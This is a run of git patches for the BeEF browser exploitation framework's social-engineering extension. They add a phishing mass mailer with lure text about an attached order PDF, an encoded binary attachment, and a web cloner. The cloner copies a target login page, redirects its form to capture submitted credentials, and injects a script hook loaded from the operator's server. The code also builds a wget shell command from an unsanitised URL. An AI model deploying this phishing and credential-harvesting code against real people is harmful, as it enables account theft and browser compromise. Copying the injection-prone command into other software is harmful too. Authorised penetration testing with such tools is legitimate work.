zPqqt2fD*6my%2Neq59QtU|^u&)9eDvI8q+i+$Ns7mS1SJUnmF+=oQEb2r3Ap7jzd$
z6nGZI6i5+B90-g}yuH|ypsP0f*H>Y7vUaLhxu;}%VOJ?vMOPtqn)DbC;`BJJsDk|c
zJl`2m3X0RjJJHsBu|vK?&_fRs{uPpN366Z+V)dgq_B^xu+vXLWw)g&A$(UZTX2=Pm
zul=I3u(xBq8B&Y;M*DA|+0Cl_q^$F)72ki&<eQRhFB#g^!ri2}!4QurU-PsIO|XH%
z^Z-RLges$8p4d}(iM~l^gBxRrXVJvDa@|bdqAwQiptgNb=2LnltHWF5&0?S8BZR+E
z)9}tnKWB?*$X%Rfnf`pB%M>7tZ^|S1eHy$=JMt_ok?<I{o5ycKs~Jp(s6yB?;92~<
zZ7qHz^#G7G4)(G*&2Ep_0?Oqx@U!6(H;8!ZnQrjK_eY+%4f4Vz3R4Hz1vp4eNZ}N&
zcx?2CTA~}cl@KMl4NkdqUQ8pbrG1a8QPmq%x`tdp5eb!7stw7*`)t<z^?}sQ$6Vg?
zEtx5?Bz;sY?<?@7OVt-zwb2rt_{c0(dzP~2^trF{@ANFC2Yw13k~l)58XVN{Wv#af
zZ}pc;DIFV%n$z*=I8-aW7TLe_%tmXrX7&mO0!VHhyjS`GZ%34wjkdBv&4ZexaV-xq
z+d2H-`8tRuEl2Cs#?pq3r;cswFzdyObuhx*mk2mk^rFLUJ=DRrS*fkt$~tu&<F$oR
z3nl2TK|R|jiAbp08ES-ot(`3~A!F^-jJTB#!8081aoh9lD@t<{QmtLUP(hJ2=dkP{
zH#MeRzp%nlq1E+k&=!t0{XG4E+C~NCBDUA!jQ}Tp7$@r#)-|@~7S1aeUctJxk))Ak
zF)(a=SWd07YZFu!yGVTvnYLSS`)Hwy@k^TM)s3O%Q}wbiac-6dsLA>`UwA~o3&X_g
zw*e)LRi*BPiVPonj@1VY_8?I#{~#t9%y?vFd-l|YqEMNu;f*A=E&Jw!9D>lhz5)j}
z3;tDWgcGm`Nc^lrY@BcQejrB6oZ+`LNlNHH@?0=0`XIk$`ct#;>*P}7it-A5^xg2%
zZ|_M4>fu@w!16WLA%W4W_1a6T&XbnThHi-%+I$m+dNA1>-tERfD3@`*jlqZCK#pDJ
zQ<-DZTaS+BZl+slM-{F5=+*a8W(=nw2t6_~>_W`=^YRBB0yxde0tupC=xtI~0zdCU
zi_lYtbo(9~%vG%Dajj*Lb$E^mj%9;B`jJ>8hUUb?%%fnM-IgFYR`1-AK{6t+F-Tt_
z=76C7musWkjU@`%oggSk7Z<%(;VFzZU#Qx*b8*|6w;b3q@H_7eV)h^(Xwl$s11hZS
zLNFL^7o8-_Tl{s*2P(W}bW&b+pZi?El$!-L17VkUdO8vc*sJP&{SQrAwoM6k(%4Tm
zeSFYLGECrB+-Vb4VfNs9J%{~O8O*9Dxe!OW%w8D%-PW7}BOgITKpms{1zB;)QpK@&
zm0Is9OCh+$AQfAGX?)#hhiHpc>@c>XMkd{Wj*(P1Uxo<02Aj)Wzcx4lNzQu*lSTen
zhML1=@)e!niGX}M5kY54ZQu$&CAu&-!-jP-?|T!;0&N{x%&?=kl?-W&FQeV(V~C8;
zF|)2eZ0(4<XD<eM-+zJ@u6fYW+68}FlcW(W2pq3Ib8HG$aeE3bUU`h>%j#OCY{E>Z
zy>5duh@Le1u7}Wur{~qD5%WxRqJ_9TJlq(o0Iqx`TsQ`ZiSmai59X7E>qhw$Oc?Z~
zX^CDM8DPGKgQ1x&n=lI@FSk#?Rz)V@&!<6)ECXdESci*wB`8C^zBlc<e=U0B)*S)e
z!<PJOX#r_MFoAKCi@<9gdsk2Fb;tD$zWK*SW2{kk4@-0(LaA?~e2mOpH!hE593YF{
z)YVKq%z;7hgK1bSNj>&gY(ze`NeK?*blw3;Td?;Qd^;`GWmJwsxB-_5xM5^pNvMy=
zGQYIYwEBr7b2Ov}_%K$Xarm?#PWd(_%|7h45nV<b5bk)vHbUeGs$nK0=HF}+I1X><
z+^2zLA4`^Yn|~TY&?Z92<U(INC9dcqR*<FIsfkW=s=16r>2^)GpvPtSBxs3Pe(}k}
z4_$rlvu+CVwsg;A%=f(s(jH=nfi5V%zGNF4>zg{$O2>Z6&3%U(XzQD2!~u~MT`4`1
z6R*lZli-=vC%t6rT*n+f5IcvMa*grKMLi`*WGug0i3$qmdC&;8tt{E}h;<iTI)1zp
zqYV&PvfQ>Zx2X7`Q|q@vI}pv}HlK#W4d~V#OvmpD@Q3<^c2Gmze5fg?7abWUpU&0W
znH{k!hF>~5magH9R*<tF>@hC%23?vy$Wpp%5cB(q3Odj5%EIMxO&S-qT{i_yefUL5
z?%fc$B@jL{!_V7m{IO$&JbZM7o>xB4gfPF`1xzB0RT#g${{vkMap-#W^ET12U>Z5r
z@+`u~44OLp<WFh^^tm&mY(3VZ3(y4oRwOqIOqxOmrUW0(5WBl4d5g$CgZc3gZ=u_6
zv)brx{|ZaZOiuNMbA@E6lu&B60`>Y(dOP5vdZ-0$OZAc1tBpSc9h3MN-xB7>{Mkfy
zQ&}<|k|4VwO<2}=7zpxd9U}H*-YgR9aTaeWZ@^Yk(5TJVWF}^DrM_!xyd$I(!+5fG
z(fmNk-AFPTei|-m1xvQUb~M*6Y$_ANJQOk}T?Sj+?$U+ck-!g8nBo^Ypb(g9@DoKB
zQ7nN=@Z`PLB~+Z&MPR$U`0}KLt9t9~0ug290iZug95exNA1m1r#0gRh%iA$PlTu?H
zst6~+6ph%u9KGhn7QoK6R5(BV2!@+w^mX-jGmr#`7s`RFGdFQS{j7;Ps{{`Lx$m(5
zjxMo7O3W}&%%mvgSW$?!(vjS(-_uSkS|bxL6D6x1#!Bk52^|%*J!}ST%R?+ZUatU7
zLKchJ``t<OSVBMP>oB>y0gC&VOX~tJOvQ|eZt(Dg7D_|(^e&!&$~hA9Y-eO06q2~Y
zY;&R4vCl>RkI1G<iCNP9%CbBh;q1xZr=4`W(chv)A{B~I#L?#BzAa{9Zx#JqWV)iF
zgl(9UXM^t8WqV=1X2mk_EICl-%zX*DLM#!RpT)NU>yWu8fBpt>m5r$oNGXVw!u0Fh
zhBb1jNkrmSUOZJ(RmGIQyu5tPsu@@{;iPkmr?Uxiaj~8bp2qw~x(GRd!8F@rIEL4P
zUVqd-Ai93}%AB8zxpnMA5@dXP4fW&>6OGkRvyrR%;H|fYyX*vhdDW>wH*?d`#f!p3
z#gnbV@CPTy*4CO1&P_aH<ec_q!}@+i6lFAs6*L#MgnH#>_g`Q9OE@}j%jaDB^%I%N
z->!z8bZ)8Ll?nSfF48A^xl^WUk&Z3Q^z_;*gDu#JpH9>^vr{mi2_2^iT8$fV;8#`4
zGjH)`LRQjpb!j3?LI&4QobjvXlmV7Lt4Gah60z@VsrzG6QbXrL5C~^JXl!bXfTAZ@
zT4%IHR-wuLR8V#e&p6hG-oWhWPa3ybGIp8(d9Cx3@!I`QH8Yy6AGoQwvJC5&%@L=R
z07M^8V4)BjPkG*^eo-_o7Rar%;qGORQ!NOot;p9FE9aL>^tbAtX6Khec3{&UN98~z
zWj;h$BzACb!T#E%F)h~xo<#_GNsF4;bv!+AvkGl|ymKgpqKYrB8NIK0JH=wRG@}8t
zB6QV+b}b)xs*{c+>Rl77mMA@^GiLn+6H#koUUnK)RP1QNI~vrjmQY-wRC^>aujep7
zZ4FRAv0YYuCP+M><id2sV2vG~*wU-c%M;ee`#O2lx;3W$o%i&+DOyn)N4z4tt##oR
zIA^Y#ar&KG^K9S8LlTJhuM%p;nUnN}*r^bD;EePl0y-VjImREWV9Sb-?psUx6+2UI
z=36Ay8_*?Q--a9gF(bFA8%`QMTFA}Vex=MsLavO+yL(*M%nj@rLL_c3u5fikEX@5Z
zEsw7jWmEa!VL0LJ@)ddOj%>(>pPbo6oYP}66xToD*14@;tKlK)Baeq^RPJiDwYek6
zx^C^4YN0^$9GZLMrGb(<%+u*A;ftpAA%eYMieGYVcD}?K!0QQnySz^(^}um{1UH4L
zf^&LOLjLsgJ#rq&&3yu6=WI=nd9s1`xWdIvgC4<GQDcMf=ap40<#+9Z0vD4WJnO>-
z^XbF|B^iwpEAsl}`0S{KYSA)XD=87t6()1pCX)GiOmCi`>7s84zVMjSjSS31#Y|NJ
zf&Jp$T94LJQWa|5{4cohr6;IPQeHHg)E~DV!9oYx*){F*ZQAHce|E9Wi8q)|fWJa!
zC7`J!X>spY>7*QofgV+_7P}_74)uBFQl&;$gW@2=5#wMHTlSL(2)+Ia9nT+7_?A6c
zO5XBPST=z!@PjQ-24f_Vj;#Zx_G+etG?D;?;R{PyH)7!#vQGwBDZ73BV1T5dgmQky
zAd5YXLn=Q(du@#+bei<5UG0hXvT7V6#&drdLaGbZs7!Eb`H}%m^@cG{73E3Ud`j=0
zSEqC^8}`T`J9DNXK_d1iRX6S$NmP`$s|7JdrPOza7S#HJA2GzRasc&jvAu}l>Wmbt
z?+}IFZSPJZVXcak*>m#RA_%-wfXDrsSjlw|dh)oExsytkwyQ2Y?xy?o-q+{FYg{wh
zjy9-s*DSNa5Hu8=_0p$$o+ka%wS3Q)t&I`mA7;P+?R-BiK)`+-Ad<m`)b`b8P>sBT
z-W3*MbS<fmX)^;zCGmce&w)lOjr5Q2rxGj_1F6>6b&{10R;-I-l~8z!5%bSk({IrE
z*3;Z&V&~;n>SdrhRL#@{Lp$fwIgQgp;S_*tTJdh<^Z4+xdUhFrdcg!5Q3IKS)CBpB
zq{zI%ONy>Ay?XL|&+%a$foSx{MQG~ET{2p8+x%Xl);8*Vei(uNVGXSjaSk(@V&aeU
zrpx+(mV#;TiuA<792!H{2LjAoqlaJ3!fgIm-<*WWnAOj!tKfg>`l~^#e9IQ|CD@E!
zc66*Pw|6Qq6RK?vsM=x0qJ^<VuKjg;2I3)gj*xfKpRbhbGrz(aztr%#6_UMe>)F)I
z!$r{GmgSbI$reEHbblfJ(E6x)amwmSRLd?aUqGcl8WF^f@RN>;Qc#JLkh1B4k!90;
zw)$ecpv|Y>A$_ER*Mn)rff^eigKFj;8{Qut-v4TYl6+F|2JaL@+L_6rJen?XPM*#r
z3ic**bQr}^MABVF{Q0?as|+LeZC!SU_3O@F^6`edFlcV?IK-I`4AxYV`ABi85^#st
z%aH_r8VljzR{Qofutli?aWx?F#y&DYLZy9tNAinuJmyWlhm3b+NMlKS+Lm;@BCKov
z#-2S|iyNlBp(2HH_-a;N!lKS7E0+FZof~^%#c@fP)J6>ZiMpa@9IUFSa<eVS@uKA?
zST<!7!}Xat#9o|^9PFM0Nu3`>oz*p6D(lBGry6LtNBjf=hJzp;?j-J9`+k5!xcrY^
zU!;oA*VC$V!Btg{<AP4q$d1#H>(k!&0)6*!6_B2Jzwyx)7W?Svfu5;7n$wEG_QmJp
z4q?&2?ZT^9h(mOs75N_!D4WKIsJcGv-<PGmB(CzbHSM&|-9sYZQne*`tM|6!o;7T8
zHtx^$)ij4rdQ`>Jw?EdBVBv<mZ|}4G2<(G&#&i3yaLPx<SZc|nk27P9DLiV5LYP~7
zAns76n(ftjj!bsLDX&C|4V##J@)+@=uNx?=P)fxar5;+Nwf~hh7CzhMyFiqzSdUi^
zcGj8FYkxtq48bA}!;YDYQ3~Id@e?)PQ*icmb^Yi{hm~bf!=kdP;=ssCoP)R1O%;m+
zhMcFlr422@+<d+k=E0R|C4gB4tD_X1B<+COo##uCYl7ii4Ge|qFFVTj=Girq-A?zG
zFCDHb-uZY;BX5OPeeuOS6pQZcBiycsr*l{rQ1s4pH6T$U{$(E>Xgh5z1~IKxw+e36
zMW9Ogo!0r@t|vUfSq<FH{>yItUm_9!7J9mWZ`c2o86uZ5(YLj-vof;BSGKY>z^B0%
zw9<F503Lp)r})d6@wdLi@4bC;DP4Vh8F_pa;7&X(3s7o8)<M_S-W4BMH~JqXsGaTq
zzUMFLiQg|UHUu8Am$9{V`1|L-DqWNRe(T@nzmizwg6s@*^bB;Y3~clOpmH3&8XX-O
z@cXytUlPvbf1Ccw45{P)Ta@FkR{Y+hS1_>$HiO|`@)djz_QqB~rHX&)LjbE_8#w3#
ztFiy1v%oEU0bmh!pxgy8FZItY{eN5oH8uo)SC0njTl{06U&_kh_w{eRi+@~87`iwC
z`vcVF_*Z_6kMEl#``^}o=E(leAvoI_8o>Z_U(7Ic|Na28UjSgv%LxCUHbw^E>3{rx
z{EBb+FB=`*@9fzBw$THV8Nj^E@6Z46qx&r{@P`cm01m+)HfGj8{eaH{=3f5v1781O
zV*oJx?(84W`%gb$1#X~x$De-xrOj;gbbt1Zj*b5JwEeGl0D}YY=ktIzmOtA996i?m
zxR;6TKc5F+X8m)VfuZ+%`v3QP0l#xef7;l7rzQWFA8=fLYmfh7V+Bf|{Apui`p<iR
z%bon;$4tleXWtm<S^tX-xMKdemyw>0`OkS{{Jp;Z^kbl7`m@bIKcEcD|85H~CjVoO
zfHsEzF)sGDx<I`PTbSPqPu|28xI~!ozsgxz0R?aVl_L|gG_nG!-~40UhzSC-!kmT-
zY<l{@>0$z~G3Wyf4FLK~47&O(y1*c&qu195aKrq+UH+LXwzCKRFa2Y2F)}dHF~g9M
J2+0V;{2!VC5QYE%

literal 0
HcmV?d00001

diff --git a/extensions/social_engineering/mass_mailer/templates/default/mail.html b/extensions/social_engineering/mass_mailer/templates/default/mail.html
index 195f9a116..a99c840cb 100644
--- a/extensions/social_engineering/mass_mailer/templates/default/mail.html
+++ b/extensions/social_engineering/mass_mailer/templates/default/mail.html
@@ -10,6 +10,8 @@ You can check the status of your hook at the following link:<br>
 <!-- be sure to have link and linktext placeholders on the same line, like the following: -->
 <a href="__link__">__linktext__</a><br>
 <br>
+For convenience, we also attached a resume of your order as PDF.<br>
+<br>
 Regards,<br>
 The BeEF team<br>
 <!-- be sure to have different images on different lines, like the following: -->
diff --git a/extensions/social_engineering/mass_mailer/templates/default/mail.plain b/extensions/social_engineering/mass_mailer/templates/default/mail.plain
index 4b57cf16d..f8796f0b5 100644
--- a/extensions/social_engineering/mass_mailer/templates/default/mail.plain
+++ b/extensions/social_engineering/mass_mailer/templates/default/mail.plain
@@ -4,5 +4,7 @@ We would like to inform you that your BeEF order has been successful.
 You can check the status of your hook at the following link:
 __link__
 
+For convenience, we also attached a resume of your order as PDF.
+
 Regards,
 The BeEF team
\ No newline at end of file

From 20d2e172329064ccd9d45f988a4a8395fbc747a7 Mon Sep 17 00:00:00 2001
From: antisnatchor <antisnatchor@gmail.com>
Date: Wed, 29 Aug 2012 17:50:14 +0100
Subject: [PATCH 010/397] Social Eng. extension: added support for SMTP servers
 that do not require authentication

---
 extensions/social_engineering/config.yaml     |  1 +
 .../mass_mailer/mass_mailer.rb                | 24 ++++++++++++++-----
 2 files changed, 19 insertions(+), 6 deletions(-)

diff --git a/extensions/social_engineering/config.yaml b/extensions/social_engineering/config.yaml
index ad4c5d529..54cb64e62 100644
--- a/extensions/social_engineering/config.yaml
+++ b/extensions/social_engineering/config.yaml
@@ -26,6 +26,7 @@ beef:
                 user_agent: "Microsoft-MacOutlook/12.12.0.111556"
                 host: "smtp.gmail.com"
                 port: 587
+                use_auth: true
                 use_tls: true
                 helo: "gmail.com" # this is usually the domain name
                 from: "yourmail@gmail.com"
diff --git a/extensions/social_engineering/mass_mailer/mass_mailer.rb b/extensions/social_engineering/mass_mailer/mass_mailer.rb
index ae0feb901..2e61b4dd8 100644
--- a/extensions/social_engineering/mass_mailer/mass_mailer.rb
+++ b/extensions/social_engineering/mass_mailer/mass_mailer.rb
@@ -55,12 +55,24 @@ module BeEF
           # create a new SMTP object, enable TLS with the previous instantiated context, and connects to the server
           smtp = Net::SMTP.new(@host, @port)
           smtp.enable_starttls(@ctx) unless @config.get("#{@config_prefix}.use_tls") == false
-          smtp.start(@helo, @from, @password, :login) do |smtp|
-            tos_hash.each do |mail, name|
-            message = compose_email(fromname, mail, name, subject, link, linktext, template)
-            smtp.send_message(message, @from, mail)
-            print_info "Mail #{x}/#{n} to [#{mail}] sent."
-            x += 1
+
+          if @config.get("#{@config_prefix}.use_auth")
+            smtp.start(@helo, @from, @password, :login) do |smtp|
+              tos_hash.each do |to, name|
+                message = compose_email(fromname, to, name, subject, link, linktext, template)
+                smtp.send_message(message, @from, to)
+                print_info "Mail #{x}/#{n} to [#{to}] sent."
+                x += 1
+              end
+            end
+          else
+            smtp.start(@helo, @from) do |smtp|
+              tos_hash.each do |to, name|
+                message = compose_email(fromname, to, name, subject, link, linktext, template)
+                smtp.send_message(message, @from, to)
+                print_info "Mail #{x}/#{n} to [#{to}] sent."
+                x += 1
+              end
             end
           end
         end

From 0260181d33fc7088b34a5b1101f0102f55c2f6ea Mon Sep 17 00:00:00 2001
From: antisnatchor <antisnatchor@gmail.com>
Date: Wed, 29 Aug 2012 19:33:14 +0100
Subject: [PATCH 011/397] Social Eng. extension: added redirection after POST
 interception, refactored Interceptor class

---
 .../web_cloner/interceptor.rb                 | 16 +++++----
 .../web_cloner/web_cloner.rb                  | 36 ++++---------------
 2 files changed, 15 insertions(+), 37 deletions(-)

diff --git a/extensions/social_engineering/web_cloner/interceptor.rb b/extensions/social_engineering/web_cloner/interceptor.rb
index 7eba2ad46..af6a899cd 100644
--- a/extensions/social_engineering/web_cloner/interceptor.rb
+++ b/extensions/social_engineering/web_cloner/interceptor.rb
@@ -19,13 +19,13 @@ module BeEF
 
       class Interceptor < Sinatra::Base
 
-      def initialize(file_path)
-        super
-        @config = BeEF::Core::Configuration.instance
-        @cloned_page = ""
-        File.open(file_path,'r').each do |line|
-          @cloned_page += line
-        end
+      def initialize(file_path, redirect_to)
+        super self
+        file = File.open(file_path,'r')
+        @cloned_page = file.read
+        @redirect_to = redirect_to
+        file.close
+        print_info "Cloned page using content from [cloned_pages/#{File.basename(file_path)}] initialized."
       end
 
       # intercept GET
@@ -44,6 +44,8 @@ module BeEF
         print_info "Intercepted data:"
         print_info data
 
+        redirect @redirect_to
+
         #todo: do a GET request on the target website, retrieve the respone headers and check if X-Frame-Options is present
         #todo: or framebusting is present. If is not present, open the original URL in an iFrame, otherwise redirect the user
         #todo: to the original page
diff --git a/extensions/social_engineering/web_cloner/web_cloner.rb b/extensions/social_engineering/web_cloner/web_cloner.rb
index f962b4e90..1261f51c8 100644
--- a/extensions/social_engineering/web_cloner/web_cloner.rb
+++ b/extensions/social_engineering/web_cloner/web_cloner.rb
@@ -27,40 +27,16 @@ module BeEF
         end
 
         def clone_page(url)
-          #todo see web_cloner.rb, work perfectly
-          # output.html and output2.html (the one with the form action modified to /)
-          # must be stored in cloned_pages
           print_info "Cloning page at URL #{url}"
           uri = URI(url)
-
-          #output = url.split("/").last #todo test if http://google.com/ produces an error
           output = uri.host
           output_mod = "#{output}_mod"
-
           user_agent = @config.get('beef.extension.social_engineering.web_cloner.user_agent')
 
-          #todo: prevent Command Injection
-          wget = "wget '#{url}' -O #{@cloned_pages_dir + output} --no-check-certificate -c -k -U '#{user_agent}'"
-          IO.popen(wget.to_s) { |f| @result = f.gets }
-          print_debug @result
-          #todo, also check if the URL is valid with:
-          #unless (url =~ URI::regexp).nil?
-          #  # Correct URL
-          #end
-
-          #todo: this should be the good way to prevent command injection, because the shell is not open.
-          #todo: there are issues:  Scheme missing when calling wget
-          #wget_path   = "wget"
-          #env         = {}
-          #args        = %W['#{url}' -O #{output} --no-check-certificate -c -k -U #{user_agent}]
-          #IO.popen([env, wget_path, *args], 'r+') { |f| @result = f.gets }
-
-
-          #if !File.writable?(File.basename(@cloned_pages_dir + output_mod))
-          #  print_info "Cannot write to file..."
-          #  IO.popen("chmod 777 #{@cloned_pages_dir}") { |f| @result = f.gets }
-          #  sleep 2
-          #end
+          #todo: prevent command injection using IO.popen passing an array of arguments
+          # see here: http://devblog.avdi.org/2012/03/29/generating-cows-with-io-popen/
+          wget = "wget '#{url}' --no-check-certificate -c -k -U '#{user_agent}' -O #{@cloned_pages_dir + output}"
+          IO.popen(wget.to_s) { |f| result = f.gets }
 
           File.open("#{@cloned_pages_dir + output_mod}", 'w') do |out_file|
             File.open("#{@cloned_pages_dir + output}", 'r').each do |line|
@@ -92,8 +68,8 @@ module BeEF
           print_info "Page at URL [#{url}] has been cloned. Modified HTML in [cloned_paged/#{output_mod}]"
 
           file_path = @cloned_pages_dir + output_mod # the path to the cloned_pages directory where we have the HTML to serve
-          @http_server.mount("/#{output}", BeEF::Extension::SocialEngineering::Interceptor.new(file_path))
-          print_info "Mounting cloned page on URL #{output}"
+          @http_server.mount("/#{output}", BeEF::Extension::SocialEngineering::Interceptor.new(file_path, url))
+          print_info "Mounting cloned page on URL [/#{output}]"
           @http_server.remap
         end
 

From 26c7696e0f3ae34e2a363867ffd22b4c37e70dea Mon Sep 17 00:00:00 2001
From: antisnatchor <antisnatchor@gmail.com>
Date: Wed, 29 Aug 2012 21:08:07 +0100
Subject: [PATCH 012/397] Social Eng. extension: if the page can be framed,
 load it in an overlay iFrame maintaining the hook :D

---
 .../web_cloner/interceptor.rb                 | 22 ++++++------
 .../web_cloner/web_cloner.rb                  | 35 +++++++++++++++----
 2 files changed, 41 insertions(+), 16 deletions(-)

diff --git a/extensions/social_engineering/web_cloner/interceptor.rb b/extensions/social_engineering/web_cloner/interceptor.rb
index af6a899cd..53ea3314f 100644
--- a/extensions/social_engineering/web_cloner/interceptor.rb
+++ b/extensions/social_engineering/web_cloner/interceptor.rb
@@ -19,24 +19,25 @@ module BeEF
 
       class Interceptor < Sinatra::Base
 
-      def initialize(file_path, redirect_to)
+      def initialize(file_path, redirect_to, frameable, beef_hook)
         super self
         file = File.open(file_path,'r')
         @cloned_page = file.read
         @redirect_to = redirect_to
+        @frameable = frameable
+        @beef_hook = beef_hook
         file.close
-        print_info "Cloned page using content from [cloned_pages/#{File.basename(file_path)}] initialized."
+        print_info "Cloned page with content from [cloned_pages/#{File.basename(file_path)}] initialized."
       end
 
       # intercept GET
       get "/" do
         print_info "GET request"
+        print_info "Referer: #{request.referer}"
         @cloned_page
       end
 
       # intercept POST
-      # the 'action' attribute of the 'form' element is modified to the URI /
-      # in this way the request can be intercepted
       post "/" do
         print_info "POST request"
         request.body.rewind
@@ -44,13 +45,14 @@ module BeEF
         print_info "Intercepted data:"
         print_info data
 
-        redirect @redirect_to
-
-        #todo: do a GET request on the target website, retrieve the respone headers and check if X-Frame-Options is present
-        #todo: or framebusting is present. If is not present, open the original URL in an iFrame, otherwise redirect the user
-        #todo: to the original page
+        if @frameable
+          print_info "Page can be framed :-) Loading original URL into iFrame..."
+          "<html><head><script type=\"text/javascript\" src=\"#{@beef_hook}\"></script>\n</head></head><body><iframe src=\"#{@redirect_to}\" style=\"border:none; background-color:white; width:100%; height:100%; position:absolute; top:0px; left:0px; padding:0px; margin:0px\"></iframe></body></html>"
+        else
+          print_info "Page can not be framed :-) Redirecting to original URL..."
+          redirect @redirect_to
+        end
       end
-
       end
     end
   end
diff --git a/extensions/social_engineering/web_cloner/web_cloner.rb b/extensions/social_engineering/web_cloner/web_cloner.rb
index 1261f51c8..0648b91f0 100644
--- a/extensions/social_engineering/web_cloner/web_cloner.rb
+++ b/extensions/social_engineering/web_cloner/web_cloner.rb
@@ -24,6 +24,7 @@ module BeEF
           @http_server = BeEF::Core::Server.instance
           @config = BeEF::Core::Configuration.instance
           @cloned_pages_dir = "#{File.expand_path('../../../../extensions/social_engineering/web_cloner', __FILE__)}/cloned_pages/"
+          @beef_hook = "http://#{@config.get('beef.http.host')}:#{@config.get('beef.http.port')}#{@config.get('beef.http.hook_file')}"
         end
 
         def clone_page(url)
@@ -68,7 +69,10 @@ module BeEF
           print_info "Page at URL [#{url}] has been cloned. Modified HTML in [cloned_paged/#{output_mod}]"
 
           file_path = @cloned_pages_dir + output_mod # the path to the cloned_pages directory where we have the HTML to serve
-          @http_server.mount("/#{output}", BeEF::Extension::SocialEngineering::Interceptor.new(file_path, url))
+
+          # Check if the original URL can be framed
+          frameable = is_frameable(url)
+          @http_server.mount("/#{output}", BeEF::Extension::SocialEngineering::Interceptor.new(file_path, url, frameable, @beef_hook))
           print_info "Mounting cloned page on URL [/#{output}]"
           @http_server.remap
         end
@@ -76,14 +80,33 @@ module BeEF
         private
         # Replace </head> with <BeEF_hook></head>
         def add_beef_hook(line)
-           host = @config.get('beef.http.host')
-           port = @config.get('beef.http.port')
-           js = @config.get('beef.http.hook_file')
-           hook = "http://#{host}:#{port}#{js}"
-           line.gsub!("</head>","<script type=\"text/javascript\" src=\"#{hook}\"></script>\n</head>")
+           line.gsub!("</head>","<script type=\"text/javascript\" src=\"#{@beef_hook}\"></script>\n</head>")
            line
         end
 
+        private
+        # check if the original URL can be framed. NOTE: doesn't check for framebusting code atm
+        def is_frameable(url)
+          result = true
+          uri = URI(url)
+          http = Net::HTTP.new(uri.host, uri.port)
+          if uri.scheme == "https"
+            http.use_ssl = true
+            http.verify_mode = OpenSSL::SSL::VERIFY_NONE
+          end
+          request = Net::HTTP::Get.new(uri.request_uri)
+          response = http.request(request)
+          frame_opt = response["X-Frame-Options"]
+
+          if frame_opt != nil
+            if frame_opt.casecmp("DENY") == 0 || frame_opt.casecmp("SAMEORIGIN") == 0
+              result = false
+            end
+          end
+          print_info "Page can be framed: [#{result}]"
+          result
+        end
+
       end
     end
   end

From 6409b3d98fe1d06f257d121fea3b01292ad88789 Mon Sep 17 00:00:00 2001
From: antisnatchor <antisnatchor@gmail.com>
Date: Wed, 29 Aug 2012 22:36:24 +0100
Subject: [PATCH 013/397] Social Eng. extension: mount point for phishing page
 is not configurable, refactored Interceptor initialization using config
 settings

---
 .../web_cloner/interceptor.rb                 | 24 ++++++++-----------
 .../web_cloner/web_cloner.rb                  | 15 ++++++++----
 2 files changed, 21 insertions(+), 18 deletions(-)

diff --git a/extensions/social_engineering/web_cloner/interceptor.rb b/extensions/social_engineering/web_cloner/interceptor.rb
index 53ea3314f..3cf6551d3 100644
--- a/extensions/social_engineering/web_cloner/interceptor.rb
+++ b/extensions/social_engineering/web_cloner/interceptor.rb
@@ -16,25 +16,21 @@
 module BeEF
   module Extension
     module SocialEngineering
-
+      require 'sinatra/base'
       class Interceptor < Sinatra::Base
 
-      def initialize(file_path, redirect_to, frameable, beef_hook)
-        super self
-        file = File.open(file_path,'r')
-        @cloned_page = file.read
-        @redirect_to = redirect_to
-        @frameable = frameable
-        @beef_hook = beef_hook
-        file.close
-        print_info "Cloned page with content from [cloned_pages/#{File.basename(file_path)}] initialized."
+      configure do
+          set :show_exceptions, false
       end
 
       # intercept GET
       get "/" do
         print_info "GET request"
         print_info "Referer: #{request.referer}"
-        @cloned_page
+        file = File.open(settings.file_path,'r')
+        cloned_page = file.read
+        file.close
+        cloned_page
       end
 
       # intercept POST
@@ -45,12 +41,12 @@ module BeEF
         print_info "Intercepted data:"
         print_info data
 
-        if @frameable
+        if settings.frameable
           print_info "Page can be framed :-) Loading original URL into iFrame..."
-          "<html><head><script type=\"text/javascript\" src=\"#{@beef_hook}\"></script>\n</head></head><body><iframe src=\"#{@redirect_to}\" style=\"border:none; background-color:white; width:100%; height:100%; position:absolute; top:0px; left:0px; padding:0px; margin:0px\"></iframe></body></html>"
+          "<html><head><script type=\"text/javascript\" src=\"#{settings.beef_hook}\"></script>\n</head></head><body><iframe src=\"#{settings.redirect_to}\" style=\"border:none; background-color:white; width:100%; height:100%; position:absolute; top:0px; left:0px; padding:0px; margin:0px\"></iframe></body></html>"
         else
           print_info "Page can not be framed :-) Redirecting to original URL..."
-          redirect @redirect_to
+          redirect settings.redirect_to
         end
       end
       end
diff --git a/extensions/social_engineering/web_cloner/web_cloner.rb b/extensions/social_engineering/web_cloner/web_cloner.rb
index 0648b91f0..13c799ded 100644
--- a/extensions/social_engineering/web_cloner/web_cloner.rb
+++ b/extensions/social_engineering/web_cloner/web_cloner.rb
@@ -27,7 +27,7 @@ module BeEF
           @beef_hook = "http://#{@config.get('beef.http.host')}:#{@config.get('beef.http.port')}#{@config.get('beef.http.hook_file')}"
         end
 
-        def clone_page(url)
+        def clone_page(url, mount)
           print_info "Cloning page at URL #{url}"
           uri = URI(url)
           output = uri.host
@@ -53,7 +53,7 @@ module BeEF
                   end
                   count += 1
                 end
-                line_attrs[count] = "action=\"/#{output}\""
+                line_attrs[count] = "action=\"#{mount}\""
                 mod_form = line_attrs.join(" ")
                 print_info "Form action value changed to / in order to be intercepted."
                 out_file.print mod_form
@@ -72,8 +72,15 @@ module BeEF
 
           # Check if the original URL can be framed
           frameable = is_frameable(url)
-          @http_server.mount("/#{output}", BeEF::Extension::SocialEngineering::Interceptor.new(file_path, url, frameable, @beef_hook))
-          print_info "Mounting cloned page on URL [/#{output}]"
+
+          interceptor = BeEF::Extension::SocialEngineering::Interceptor
+          interceptor.set :file_path, file_path
+          interceptor.set :redirect_to, url
+          interceptor.set :frameable, frameable
+          interceptor.set :beef_hook, @beef_hook
+
+          @http_server.mount("#{mount}", interceptor.new)
+          print_info "Mounting cloned page on URL [#{mount}]"
           @http_server.remap
         end
 

From 9ea0f60138e3311e57526ad0a9d1b61cda7a96ab Mon Sep 17 00:00:00 2001
From: antisnatchor <antisnatchor@gmail.com>
Date: Wed, 29 Aug 2012 22:48:45 +0100
Subject: [PATCH 014/397] Social Eng. extension: added default PDF attachment
 to config.yaml

---
 extensions/social_engineering/config.yaml | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/extensions/social_engineering/config.yaml b/extensions/social_engineering/config.yaml
index 54cb64e62..de77968e4 100644
--- a/extensions/social_engineering/config.yaml
+++ b/extensions/social_engineering/config.yaml
@@ -29,7 +29,7 @@ beef:
                 use_auth: true
                 use_tls: true
                 helo: "gmail.com" # this is usually the domain name
-                from: "yourmail@gmail.com"
+                from: "youruser@gmail.com"
                 password: "yourpass"
                 # available templates
                 templates:
